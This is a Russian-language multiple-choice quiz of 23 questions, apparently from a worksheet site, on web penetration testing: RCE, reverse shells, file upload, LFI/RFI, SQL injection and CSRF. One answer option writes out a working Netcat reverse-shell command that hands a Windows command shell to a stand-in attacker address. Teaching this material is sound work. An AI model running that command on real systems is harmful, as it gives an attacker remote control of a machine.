NEW
Font size
WorksheetsВопросы рабочего листа по кибербезопасности
Total questions: 23
Worksheet time: 12mins
В каком языке чаще всего встречаются RCE-уязвимости из-за динамической интерпретации?
PHP
GO
Java
HTML
Какое действие помогает снизить риск RCE?
Очистка и фильтрация пользовательского ввода
Хеширование паролей
Кэширование страниц
Использование HTTPS
Что описывает обратное TCP-соединение (Reverse TCP)?
Сценарий, при котором программа на целевом хосте инициирует исходящее TCP-соединение к машине атакующего, обходя ограничения на входящие подключения
Метод защиты сети, при котором сервер принимает только входящие соединения из доверенной подсети
Тип сетевого сканирования, используемый для обнаружения открытых TCP-портов на удалённом хосте
Механизм шифрования TCP-трафика между клиентом и сервером для предотвращения перехвата данных
Какой инструмент используется для создания и управления обратными TCP-сеансами?
MetaSploit
Wireshark
Nmap
Hashcat
Что происходит после успешного установления обратного TCP-сеанса?
Атакующий получает интерактивную оболочку (shell) удалённой системы и может выполнять команды через TCP-соединение
TCP-соединение автоматически разрывается после проверки доступности хоста
На целевой системе запускается только процесс сетевого сканирования без возможности выполнения команд
Соединение используется исключительно для передачи зашифрованных лог-файлов на сервер атакующего
Что представляет собой уязвимость загрузки файлов?
Возможность загрузки вредоносного файла на сервер
Ошибка при передаче данных через FTP
Недоступность сервера изза размера файла
Потеря соединения с клиентом
Какой файл чаще используется злоумышленником для эксплуатации File Upload уязвимости?
php
html
xml
jpg
Какой метод эффективнее предотвращает уязвимость загрузки файлов?
Проверка MIME-типа и пути сохранения
Сжатие загружаемых данных
Запись логов сервера
Ограничение размера файлов
Что характеризует LFI (Local File Inclusion)?
Включение локальных файлов
Внедрение SQL-запросов
Открытие порта сервера
Перенаправление на внешний ресурс
Что характеризует RFI (Remote File Inclusion)?
Подключение удалённого файла по URL
Ошибка HTTP заголовков
Встраивание SQL-запроса
Подключение локального файла
Какова основная цель итогового отчёта пентеста?
Демонстрация уровня взлома
Анализ скорости отклика сайта
Подробное описание найденных уязвимостей и способов их решения
Сокрытие следов атак
Какой шаг рекомендуется после завершения пентеста?
Провести повторный пентест
Передать результаты владельцу сайта
Сменить IP-адрес
Опубликовать найденные уязвимости
Какая команда Netcat используется для запуска обратной оболочки в Windows?
nc -zv 10.0.0.1 80
nc -listen 80
nc -e cmd.exe 10.0.0.1 4444
nc -lvp 4444
Какой тип уязвимости чаще всего позволяет добиться RCE при неверной обработке пользовательских данных?
HTML Injection
SQL Injection
XSS
Command Injection
Какой набор инструментов чаще всего используется при веб-пентестинге?
Nmap, Filezilla, paint
Wireshark, wordpress, python
GIMP, Netcat, Github
Metasploit, BurpSuit, Nikto
Какая из следующих практик не поможет предотвратить CSRF?
Публичное раскрытие секретного ключа
Применение SameSite Strict для cookie
Проверка заголовков Origin/Referer
Использование уникальных CSRF токенов
Что такое SQL Injection?
Введение произвольного SQL-кода через пользовательский ввод
Авто восстановление таблиц
Метод оптимизации
Процесс шифрования данных в БД
Что является основной причиной SQL Injection уязвимости?
Использование большого количества таблиц
Длинные запросы
Неверная конфигурация сервера
Отсутствие фильтрации и параметризации
Какой тип SQLi показывает подробную ошибку, помогающую атакующему?
Out-of-band
Error-based
Blind-based
Static-based
Что является примером Error-Based SQL Injection?
Обход CSRF токена
Изменение времени ответа
Ответы только true/false
Получение SQL-ошибки с именами таблиц
Blind-Based SQLi обычно характеризуется:
Использованием ошибок для получения структуры БД
Необходимостью анализа косвенных признаков
Полным отсутствием ответа от сервера
Авто выводом таблиц
Какой подтип Blind SQL Injection основан на задержках?
Error-based
Boolean-based
Time-based
Cookie-based
Что такое CSRF-атака?
Анализ SQL-запросов
Атака, подменяющая DNS-запросы
Эксплуатация ошибки сериализации
Перехват трафика по ARP
Атака, в которой злоумышленник заставляет браузер жертвы выполнить нежелательный запрос
